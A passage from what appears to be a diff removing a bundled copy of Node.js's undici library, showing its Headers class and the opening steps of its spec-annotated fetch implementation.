this[kHeadersMap].get(name.toLowerCase()) - - // 1. If list does not contain name, then return null. - // 2. Return the values of all headers in list whose name - // is a byte-case-insensitive match for name, - // separated from each other by 0x2C 0x20, in order. - return value === undefined ? 
null : value.value - } - - * [Symbol.iterator] () { - // use the lowercased name - for (const [name, { value }] of this[kHeadersMap]) { - yield [name, value] - } - } - - get entries () { - const headers = {} - - if (this[kHeadersMap].size) { - for (const { name, value } of this[kHeadersMap].values()) { - headers[name] = value - } - } - - return headers - } -} - -// https://fetch.spec.whatwg.org/#headers-class -class Headers { - constructor (init = undefined) { - if (init === kConstruct) { - return - } - this[kHeadersList] = new HeadersList() - - // The new Headers(init) constructor steps are: - - // 1. Set this’s guard to "none". - this[kGuard] = 'none' - - // 2. If init is given, then fill this with init. - if (init !== undefined) { - init = webidl.converters.HeadersInit(init) - fill(this, init) - } - } - - // https://fetch.spec.whatwg.org/#dom-headers-append - append (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.append' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - return appendHeader(this, name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-delete - delete (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.delete' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.delete', - value: name, - type: 'header name' - }) - } - - // 2. If this’s guard is "immutable", then throw a TypeError. - // 3. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 4. Otherwise, if this’s guard is "request-no-cors", name - // is not a no-CORS-safelisted request-header name, and - // name is not a privileged no-CORS request-header name, - // return. - // 5. 
Otherwise, if this’s guard is "response" and name is - // a forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 6. If this’s header list does not contain name, then - // return. - if (!this[kHeadersList].contains(name)) { - return - } - - // 7. Delete name from this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this. - this[kHeadersList].delete(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-get - get (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.get' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.get', - value: name, - type: 'header name' - }) - } - - // 2. Return the result of getting name from this’s header - // list. - return this[kHeadersList].get(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-has - has (name) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.has' }) - - name = webidl.converters.ByteString(name) - - // 1. If name is not a header name, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.has', - value: name, - type: 'header name' - }) - } - - // 2. Return true if this’s header list contains name; - // otherwise false. 
- return this[kHeadersList].contains(name) - } - - // https://fetch.spec.whatwg.org/#dom-headers-set - set (name, value) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.set' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value, - type: 'header value' - }) - } - - // 3. If this’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 5. Otherwise, if this’s guard is "request-no-cors" and - // name/value is not a no-CORS-safelisted request-header, - // return. - // 6. Otherwise, if this’s guard is "response" and name is a - // forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 7. Set (name, value) in this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this - this[kHeadersList].set(name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-getsetcookie - getSetCookie () { - webidl.brandCheck(this, Headers) - - // 1. If this’s header list does not contain `Set-Cookie`, then return « ». - // 2. Return the values of all headers in this’s header list whose name is - // a byte-case-insensitive match for `Set-Cookie`, in order. 
- - const list = this[kHeadersList].cookies - - if (list) { - return [...list] - } - - return [] - } - - // https://fetch.spec.whatwg.org/#concept-header-list-sort-and-combine - get [kHeadersSortedMap] () { - if (this[kHeadersList][kHeadersSortedMap]) { - return this[kHeadersList][kHeadersSortedMap] - } - - // 1. Let headers be an empty list of headers with the key being the name - // and value the value. - const headers = [] - - // 2. Let names be the result of convert header names to a sorted-lowercase - // set with all the names of the headers in list. - const names = [...this[kHeadersList]].sort((a, b) => a[0] < b[0] ? -1 : 1) - const cookies = this[kHeadersList].cookies - - // 3. For each name of names: - for (let i = 0; i < names.length; ++i) { - const [name, value] = names[i] - // 1. If name is `set-cookie`, then: - if (name === 'set-cookie') { - // 1. Let values be a list of all values of headers in list whose name - // is a byte-case-insensitive match for name, in order. - - // 2. For each value of values: - // 1. Append (name, value) to headers. - for (let j = 0; j < cookies.length; ++j) { - headers.push([name, cookies[j]]) - } - } else { - // 2. Otherwise: - - // 1. Let value be the result of getting name from list. - - // 2. Assert: value is non-null. - assert(value !== null) - - // 3. Append (name, value) to headers. - headers.push([name, value]) - } - } - - this[kHeadersList][kHeadersSortedMap] = headers - - // 4. Return headers. 
- return headers - } - - keys () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key' - ) - } - - values () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'value' - ) - } - - entries () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key+value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key+value' - ) - } - - /** - * @param {(value: string, key: string, self: Headers) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'Headers': parameter 1 is not of type 'Function'." 
- ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } - - [Symbol.for('nodejs.util.inspect.custom')] () { - webidl.brandCheck(this, Headers) - - return this[kHeadersList] - } -} - -Headers.prototype[Symbol.iterator] = Headers.prototype.entries - -Object.defineProperties(Headers.prototype, { - append: kEnumerableProperty, - delete: kEnumerableProperty, - get: kEnumerableProperty, - has: kEnumerableProperty, - set: kEnumerableProperty, - getSetCookie: kEnumerableProperty, - keys: kEnumerableProperty, - values: kEnumerableProperty, - entries: kEnumerableProperty, - forEach: kEnumerableProperty, - [Symbol.iterator]: { enumerable: false }, - [Symbol.toStringTag]: { - value: 'Headers', - configurable: true - } -}) - -webidl.converters.HeadersInit = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (V[Symbol.iterator]) { - return webidl.converters['sequence>'](V) - } - - return webidl.converters['record'](V) - } - - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) -} - -module.exports = { - fill, - Headers, - HeadersList -} - - -/***/ }), - -/***/ 4881: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { - Response, - makeNetworkError, - makeAppropriateNetworkError, - filterResponse, - makeResponse -} = __nccwpck_require__(7823) -const { Headers } = __nccwpck_require__(554) -const { Request, makeRequest } = __nccwpck_require__(8359) -const zlib = __nccwpck_require__(9796) -const { - bytesMatch, - makePolicyContainer, - clonePolicyContainer, - requestBadPort, - TAOCheck, - appendRequestOriginHeader, - responseLocationURL, - requestCurrentURL, - setRequestReferrerPolicyOnRedirect, - tryUpgradeRequestToAPotentiallyTrustworthyURL, - createOpaqueTimingInfo, - appendFetchMetadata, - corsCheck, - crossOriginResourcePolicyCheck, - 
determineRequestsReferrer, - coarsenedSharedCurrentTime, - createDeferredPromise, - isBlobLike, - sameOrigin, - isCancelled, - isAborted, - isErrorLike, - fullyReadBody, - readableStreamClose, - isomorphicEncode, - urlIsLocal, - urlIsHttpHttpsScheme, - urlHasHttpsScheme -} = __nccwpck_require__(2538) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const assert = __nccwpck_require__(9491) -const { safelyExtractBody } = __nccwpck_require__(1472) -const { - redirectStatusSet, - nullBodyStatus, - safeMethodsSet, - requestBodyHeader, - subresourceSet, - DOMException -} = __nccwpck_require__(1037) -const { kHeadersList } = __nccwpck_require__(2785) -const EE = __nccwpck_require__(2361) -const { Readable, pipeline } = __nccwpck_require__(2781) -const { addAbortListener, isErrored, isReadable, nodeMajor, nodeMinor } = __nccwpck_require__(3983) -const { dataURLProcessor, serializeAMimeType } = __nccwpck_require__(685) -const { TransformStream } = __nccwpck_require__(5356) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { webidl } = __nccwpck_require__(1744) -const { STATUS_CODES } = __nccwpck_require__(3685) -const GET_OR_HEAD = ['GET', 'HEAD'] - -/** @type {import('buffer').resolveObjectURL} */ -let resolveObjectURL -let ReadableStream = globalThis.ReadableStream - -class Fetch extends EE { - constructor (dispatcher) { - super() - - this.dispatcher = dispatcher - this.connection = null - this.dump = false - this.state = 'ongoing' - // 2 terminated listeners get added per request, - // but only 1 gets removed. If there are 20 redirects, - // 21 listeners will be added. - // See https://github.com/nodejs/undici/issues/1711 - // TODO (fix): Find and fix root cause for leaked listener. 
- this.setMaxListeners(21) - } - - terminate (reason) { - if (this.state !== 'ongoing') { - return - } - - this.state = 'terminated' - this.connection?.destroy(reason) - this.emit('terminated', reason) - } - - // https://fetch.spec.whatwg.org/#fetch-controller-abort - abort (error) { - if (this.state !== 'ongoing') { - return - } - - // 1. Set controller’s state to "aborted". - this.state = 'aborted' - - // 2. Let fallbackError be an "AbortError" DOMException. - // 3. Set error to fallbackError if it is not given. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 4. Let serializedError be StructuredSerialize(error). - // If that threw an exception, catch it, and let - // serializedError be StructuredSerialize(fallbackError). - - // 5. Set controller’s serialized abort reason to serializedError. - this.serializedAbortReason = error - - this.connection?.destroy(error) - this.emit('terminated', error) - } -} - -// https://fetch.spec.whatwg.org/#fetch-method -function fetch (input, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'globalThis.fetch' }) - - // 1. Let p be a new promise. - const p = createDeferredPromise() - - // 2. Let requestObject be the result of invoking the initial value of - // Request as constructor with input and init as arguments. If this throws - // an exception, reject p with it and return p. - let requestObject - - try { - requestObject = new Request(input, init) - } catch (e) { - p.reject(e) - return p.promise - } - - // 3. Let request be requestObject’s request. - const request = requestObject[kState] - - // 4. If requestObject’s signal’s aborted flag is set, then: - if (requestObject.signal.aborted) { - // 1. Abort the fetch() call with p, request, null, and - // requestObject’s signal’s abort reason. - abortFetch(p, request, null, requestObject.signal.reason) - - // 2. Return p. - return p.promise - } - - // 5. Let globalObject be request’s client’s global object. 
- const globalObject = request.client.globalObject - - // 6. If globalObject is a ServiceWorkerGlobalScope object, then set - // request’s service-workers mode to "none". - if (globalObject?.constructor?.name === 'ServiceWorkerGlobalScope') { - request.serviceWorkers = 'none' - } - - // 7. Let responseObject be null. - let responseObject = null - - // 8. Let relevantRealm be this’s relevant Realm. - const relevantRealm = null - - // 9. Let locallyAborted be false. - let locallyAborted = false - - // 10. Let controller be null. - let controller = null - - // 11. Add the following abort steps to requestObject’s signal: - addAbortListener( - requestObject.signal, - () => { - // 1. Set locallyAborted to true. - locallyAborted = true - - // 2. Assert: controller is non-null. - assert(controller != null) - - // 3. Abort controller with requestObject’s signal’s abort reason. - controller.abort(requestObject.signal.reason) - - // 4. Abort the fetch() call with p, request, responseObject, - // and requestObject’s signal’s abort reason. - abortFetch(p, request, responseObject, requestObject.signal.reason) - } - ) - - // 12. Let handleFetchDone given response response be to finalize and - // report timing with response, globalObject, and "fetch". - const handleFetchDone = (response) => - finalizeAndReportTiming(response, 'fetch') - - // 13. Set controller to the result of calling fetch given request, - // with processResponseEndOfBody set to handleFetchDone, and processResponse - // given response being these substeps: - - const processResponse = (response) => { - // 1. If locallyAborted is true, terminate these substeps. - if (locallyAborted) { - return Promise.resolve() - } - - // 2. If response’s aborted flag is set, then: - if (response.aborted) { - // 1. Let deserializedError be the result of deserialize a serialized - // abort reason given controller’s serialized abort reason and - // relevantRealm. - - // 2. 
Abort the fetch() call with p, request, responseObject, and - // deserializedError. - - abortFetch(p, request, responseObject, controller.serializedAbortReason) - return Promise.resolve() - } - - // 3. If response is a network error, then reject p with a TypeError - // and terminate these substeps. - if (response.type === 'error') { - p.reject( - Object.assign(new TypeError('fetch failed'), { cause: response.error }) - ) - return Promise.resolve() - } - - // 4. Set responseObject to the result of creating a Response object, - // given response, "immutable", and relevantRealm. - responseObject = new Response() - responseObject[kState] = response - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - - // 5. Resolve p with responseObject. - p.resolve(responseObject) - } - - controller = fetching({ - request, - processResponseEndOfBody: handleFetchDone, - processResponse, - dispatcher: init.dispatcher ?? getGlobalDispatcher() // undici - }) - - // 14. Return p. - return p.promise -} - -// https://fetch.spec.whatwg.org/#finalize-and-report-timing -function finalizeAndReportTiming (response, initiatorType = 'other') { - // 1. If response is an aborted network error, then return. - if (response.type === 'error' && response.aborted) { - return - } - - // 2. If response’s URL list is null or empty, then return. - if (!response.urlList?.length) { - return - } - - // 3. Let originalURL be response’s URL list[0]. - const originalURL = response.urlList[0] - - // 4. Let timingInfo be response’s timing info. - let timingInfo = response.timingInfo - - // 5. Let cacheState be response’s cache state. - let cacheState = response.cacheState - - // 6. If originalURL’s scheme is not an HTTP(S) scheme, then return. - if (!urlIsHttpHttpsScheme(originalURL)) { - return - } - - // 7. If timingInfo is null, then return. 
- if (timingInfo === null) { - return - } - - // 8. If response’s timing allow passed flag is not set, then: - if (!response.timingAllowPassed) { - // 1. Set timingInfo to a the result of creating an opaque timing info for timingInfo. - timingInfo = createOpaqueTimingInfo({ - startTime: timingInfo.startTime - }) - - // 2. Set cacheState to the empty string. - cacheState = '' - } - - // 9. Set timingInfo’s end time to the coarsened shared current time - // given global’s relevant settings object’s cross-origin isolated - // capability. - // TODO: given global’s relevant settings object’s cross-origin isolated - // capability? - timingInfo.endTime = coarsenedSharedCurrentTime() - - // 10. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 11. Mark resource timing for timingInfo, originalURL, initiatorType, - // global, and cacheState. - markResourceTiming( - timingInfo, - originalURL, - initiatorType, - globalThis, - cacheState - ) -} - -// https://w3c.github.io/resource-timing/#dfn-mark-resource-timing -function markResourceTiming (timingInfo, originalURL, initiatorType, globalThis, cacheState) { - if (nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 2)) { - performance.markResourceTiming(timingInfo, originalURL.href, initiatorType, globalThis, cacheState) - } -} - -// https://fetch.spec.whatwg.org/#abort-fetch -function abortFetch (p, request, responseObject, error) { - // Note: AbortSignal.reason was added in node v17.2.0 - // which would give us an undefined error to reject with. - // Remove this once node v16 is no longer supported. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 1. Reject promise with error. - p.reject(error) - - // 2. If request’s body is not null and is readable, then cancel request’s - // body with error. 
- if (request.body != null && isReadable(request.body?.stream)) { - request.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } - - // 3. If responseObject is null, then return. - if (responseObject == null) { - return - } - - // 4. Let response be responseObject’s response. - const response = responseObject[kState] - - // 5. If response’s body is not null and is readable, then error response’s - // body with error. - if (response.body != null && isReadable(response.body?.stream)) { - response.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } -} - -// https://fetch.spec.whatwg.org/#fetching -function fetching ({ - request, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseEndOfBody, - processResponseConsumeBody, - useParallelQueue = false, - dispatcher // undici -}) { - // 1. Let taskDestination be null. - let taskDestination = null - - // 2. Let crossOriginIsolatedCapability be false. - let crossOriginIsolatedCapability = false - - // 3. If request’s client is non-null, then: - if (request.client != null) { - // 1. Set taskDestination to request’s client’s global object. - taskDestination = request.client.globalObject - - // 2. Set crossOriginIsolatedCapability to request’s client’s cross-origin - // isolated capability. - crossOriginIsolatedCapability = - request.client.crossOriginIsolatedCapability - } - - // 4. If useParallelQueue is true, then set taskDestination to the result of - // starting a new parallel queue. - // TODO - - // 5. Let timingInfo be a new fetch timing info whose start time and - // post-redirect start time are the coarsened shared current time given - // crossOriginIsolatedCapability. 
- const currenTime = coarsenedSharedCurrentTime(crossOriginIsolatedCapability) - const timingInfo = createOpaqueTimingInfo({ - startTime: currenTime - }) - - // 6. Let fetchParams be a new fetch params whose - // request is request, - // timing info is timingInfo, - // process request body chunk length is processRequestBodyChunkLength, - // process request end-of-body is processRequestEndOfBody, - // process response is processResponse, - // process response consume body is processResponseConsumeBody, - // process response end-of-body is processResponseEndOfBody, - // task destination is taskDestination, - // and cross-origin isolated capability is crossOriginIsolatedCapability. - const fetchParams = { - controller: new Fetch(dispatcher), - request, - timingInfo, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseConsumeBody, - processResponseEndOfBody, - taskDestination, - crossOriginIsolatedCapability - } - - // 7. If request’s body is a byte sequence, then set request’s body to - // request’s body as a body. - // NOTE: Since fetching is only called from fetch, body should already be - // extracted. - assert(!request.body || request.body.stream) - - // 8. If request’s window is "client", then set request’s window to request’s - // client, if request’s client’s global object is a Window object; otherwise - // "no-window". - if (request.window === 'client') { - // TODO: What if request.client is null? - request.window = - request.client?.globalObject?.constructor?.name === 'Window' - ? request.client - : 'no-window' - } - - // 9. If request’s origin is "client", then set request’s origin to request’s - // client’s origin. - if (request.origin === 'client') { - // TODO: What if request.client is null? - request.origin = request.client?.origin - } - - // 10. If all of the following conditions are true: - // TODO - - // 11. 
If request’s policy container is "client", then: - if (request.policyContainer === 'client') { - // 1. If request’s client is non-null, then set request’s policy - // container to a clone of request’s client’s policy container. [HTML] - if (request.client != null) { - request.policyContainer = clonePolicyContainer( - request.client.policyContainer - ) - } else { - // 2. Otherwise, set request’s policy container to a new policy - // container. - request.policyContainer = makePolicyContainer() - } - } - - // 12. If request’s header list does not contain `Accept`, then: - if (!request.headersList.contains('accept')) { - // 1. Let value be `*/*`. - const value = '*/*' - - // 2. A user agent should set value to the first matching statement, if - // any, switching on request’s destination: - // "document" - // "frame" - // "iframe" - // `text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8` - // "image" - // `image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5` - // "style" - // `text/css,*/*;q=0.1` - // TODO - - // 3. Append `Accept`/value to request’s header list. - request.headersList.append('accept', value) - } - - // 13. If request’s header list does not contain `Accept-Language`, then - // user agents should append `Accept-Language`/an appropriate value to - // request’s header list. - if (!request.headersList.contains('accept-language')) { - request.headersList.append('accept-language', '*') - } - - // 14. If request’s priority is null, then use request’s initiator and - // destination appropriately in setting request’s priority to a - // user-agent-defined object. - if (request.priority === null) { - // TODO - } - - // 15. If request is a subresource request, then: - if (subresourceSet.has(request.destination)) { - // TODO - } - - // 16. Run main fetch given fetchParams. - mainFetch(fetchParams) - .catch(err => { - fetchParams.controller.terminate(err) - }) - - // 17. 
Return fetchParam's controller - return fetchParams.controller -} - -// https://fetch.spec.whatwg.org/#concept-main-fetch -async function mainFetch (fetchParams, recursive = false) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. If request’s local-URLs-only flag is set and request’s current URL is - // not local, then set response to a network error. - if (request.localURLsOnly && !urlIsLocal(requestCurrentURL(request))) { - response = makeNetworkError('local URLs only') - } - - // 4. Run report Content Security Policy violations for request. - // TODO - - // 5. Upgrade request to a potentially trustworthy URL, if appropriate. - tryUpgradeRequestToAPotentiallyTrustworthyURL(request) - - // 6. If should request be blocked due to a bad port, should fetching request - // be blocked as mixed content, or should request be blocked by Content - // Security Policy returns blocked, then set response to a network error. - if (requestBadPort(request) === 'blocked') { - response = makeNetworkError('bad port') - } - // TODO: should fetching request be blocked as mixed content? - // TODO: should request be blocked by Content Security Policy? - - // 7. If request’s referrer policy is the empty string, then set request’s - // referrer policy to request’s policy container’s referrer policy. - if (request.referrerPolicy === '') { - request.referrerPolicy = request.policyContainer.referrerPolicy - } - - // 8. If request’s referrer is not "no-referrer", then set request’s - // referrer to the result of invoking determine request’s referrer. - if (request.referrer !== 'no-referrer') { - request.referrer = determineRequestsReferrer(request) - } - - // 9. 
Set request’s current URL’s scheme to "https" if all of the following - // conditions are true: - // - request’s current URL’s scheme is "http" - // - request’s current URL’s host is a domain - // - Matching request’s current URL’s host per Known HSTS Host Domain Name - // Matching results in either a superdomain match with an asserted - // includeSubDomains directive or a congruent match (with or without an - // asserted includeSubDomains directive). [HSTS] - // TODO - - // 10. If recursive is false, then run the remaining steps in parallel. - // TODO - - // 11. If response is null, then set response to the result of running - // the steps corresponding to the first matching statement: - if (response === null) { - response = await (async () => { - const currentURL = requestCurrentURL(request) - - if ( - // - request’s current URL’s origin is same origin with request’s origin, - // and request’s response tainting is "basic" - (sameOrigin(currentURL, request.url) && request.responseTainting === 'basic') || - // request’s current URL’s scheme is "data" - (currentURL.protocol === 'data:') || - // - request’s mode is "navigate" or "websocket" - (request.mode === 'navigate' || request.mode === 'websocket') - ) { - // 1. Set request’s response tainting to "basic". - request.responseTainting = 'basic' - - // 2. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s mode is "same-origin" - if (request.mode === 'same-origin') { - // 1. Return a network error. - return makeNetworkError('request mode cannot be "same-origin"') - } - - // request’s mode is "no-cors" - if (request.mode === 'no-cors') { - // 1. If request’s redirect mode is not "follow", then return a network - // error. - if (request.redirect !== 'follow') { - return makeNetworkError( - 'redirect mode cannot be "follow" for "no-cors" request' - ) - } - - // 2. Set request’s response tainting to "opaque". 
- request.responseTainting = 'opaque' - - // 3. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s current URL’s scheme is not an HTTP(S) scheme - if (!urlIsHttpHttpsScheme(requestCurrentURL(request))) { - // Return a network error. - return makeNetworkError('URL scheme must be a HTTP(S) scheme') - } - - // - request’s use-CORS-preflight flag is set - // - request’s unsafe-request flag is set and either request’s method is - // not a CORS-safelisted method or CORS-unsafe request-header names with - // request’s header list is not empty - // 1. Set request’s response tainting to "cors". - // 2. Let corsWithPreflightResponse be the result of running HTTP fetch - // given fetchParams and true. - // 3. If corsWithPreflightResponse is a network error, then clear cache - // entries using request. - // 4. Return corsWithPreflightResponse. - // TODO - - // Otherwise - // 1. Set request’s response tainting to "cors". - request.responseTainting = 'cors' - - // 2. Return the result of running HTTP fetch given fetchParams. - return await httpFetch(fetchParams) - })() - } - - // 12. If recursive is true, then return response. - if (recursive) { - return response - } - - // 13. If response is not a network error and response is not a filtered - // response, then: - if (response.status !== 0 && !response.internalResponse) { - // If request’s response tainting is "cors", then: - if (request.responseTainting === 'cors') { - // 1. Let headerNames be the result of extracting header list values - // given `Access-Control-Expose-Headers` and response’s header list. - // TODO - // 2. If request’s credentials mode is not "include" and headerNames - // contains `*`, then set response’s CORS-exposed header-name list to - // all unique header names in response’s header list. - // TODO - // 3. Otherwise, if headerNames is not null or failure, then set - // response’s CORS-exposed header-name list to headerNames. 
- // TODO - } - - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (request.responseTainting === 'basic') { - response = filterResponse(response, 'basic') - } else if (request.responseTainting === 'cors') { - response = filterResponse(response, 'cors') - } else if (request.responseTainting === 'opaque') { - response = filterResponse(response, 'opaque') - } else { - assert(false) - } - } - - // 14. Let internalResponse be response, if response is a network error, - // and response’s internal response otherwise. - let internalResponse = - response.status === 0 ? response : response.internalResponse - - // 15. If internalResponse’s URL list is empty, then set it to a clone of - // request’s URL list. - if (internalResponse.urlList.length === 0) { - internalResponse.urlList.push(...request.urlList) - } - - // 16. If request’s timing allow failed flag is unset, then set - // internalResponse’s timing allow passed flag. - if (!request.timingAllowFailed) { - response.timingAllowPassed = true - } - - // 17. If response is not a network error and any of the following returns - // blocked - // - should internalResponse to request be blocked as mixed content - // - should internalResponse to request be blocked by Content Security Policy - // - should internalResponse to request be blocked due to its MIME type - // - should internalResponse to request be blocked due to nosniff - // TODO - - // 18. If response’s type is "opaque", internalResponse’s status is 206, - // internalResponse’s range-requested flag is set, and request’s header - // list does not contain `Range`, then set response and internalResponse - // to a network error. - if ( - response.type === 'opaque' && - internalResponse.status === 206 && - internalResponse.rangeRequested && - !request.headers.contains('range') - ) { - response = internalResponse = makeNetworkError() - } - - // 19. 
If response is not a network error and either request’s method is - // `HEAD` or `CONNECT`, or internalResponse’s status is a null body status, - // set internalResponse’s body to null and disregard any enqueuing toward - // it (if any). - if ( - response.status !== 0 && - (request.method === 'HEAD' || - request.method === 'CONNECT' || - nullBodyStatus.includes(internalResponse.status)) - ) { - internalResponse.body = null - fetchParams.controller.dump = true - } - - // 20. If request’s integrity metadata is not the empty string, then: - if (request.integrity) { - // 1. Let processBodyError be this step: run fetch finale given fetchParams - // and a network error. - const processBodyError = (reason) => - fetchFinale(fetchParams, makeNetworkError(reason)) - - // 2. If request’s response tainting is "opaque", or response’s body is null, - // then run processBodyError and abort these steps. - if (request.responseTainting === 'opaque' || response.body == null) { - processBodyError(response.error) - return - } - - // 3. Let processBody given bytes be these steps: - const processBody = (bytes) => { - // 1. If bytes do not match request’s integrity metadata, - // then run processBodyError and abort these steps. [SRI] - if (!bytesMatch(bytes, request.integrity)) { - processBodyError('integrity mismatch') - return - } - - // 2. Set response’s body to bytes as a body. - response.body = safelyExtractBody(bytes)[0] - - // 3. Run fetch finale given fetchParams and response. - fetchFinale(fetchParams, response) - } - - // 4. Fully read response’s body given processBody and processBodyError. - await fullyReadBody(response.body, processBody, processBodyError) - } else { - // 21. Otherwise, run fetch finale given fetchParams and response. 
- fetchFinale(fetchParams, response) - } -} - -// https://fetch.spec.whatwg.org/#concept-scheme-fetch -// given a fetch params fetchParams -function schemeFetch (fetchParams) { - // Note: since the connection is destroyed on redirect, which sets fetchParams to a - // cancelled state, we do not want this condition to trigger *unless* there have been - // no redirects. See https://github.com/nodejs/undici/issues/1776 - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams) && fetchParams.request.redirectCount === 0) { - return Promise.resolve(makeAppropriateNetworkError(fetchParams)) - } - - // 2. Let request be fetchParams’s request. - const { request } = fetchParams - - const { protocol: scheme } = requestCurrentURL(request) - - // 3. Switch on request’s current URL’s scheme and run the associated steps: - switch (scheme) { - case 'about:': { - // If request’s current URL’s path is the string "blank", then return a new response - // whose status message is `OK`, header list is « (`Content-Type`, `text/html;charset=utf-8`) », - // and body is the empty byte sequence as a body. - - // Otherwise, return a network error. - return Promise.resolve(makeNetworkError('about scheme is not supported')) - } - case 'blob:': { - if (!resolveObjectURL) { - resolveObjectURL = (__nccwpck_require__(4300).resolveObjectURL) - } - - // 1. Let blobURLEntry be request’s current URL’s blob URL entry. - const blobURLEntry = requestCurrentURL(request) - - // https://github.com/web-platform-tests/wpt/blob/7b0ebaccc62b566a1965396e5be7bb2bc06f841f/FileAPI/url/resources/fetch-tests.js#L52-L56 - // Buffer.resolveObjectURL does not ignore URL queries. - if (blobURLEntry.search.length !== 0) { - return Promise.resolve(makeNetworkError('NetworkError when attempting to fetch resource.')) - } - - const blobURLEntryObject = resolveObjectURL(blobURLEntry.toString()) - - // 2. 
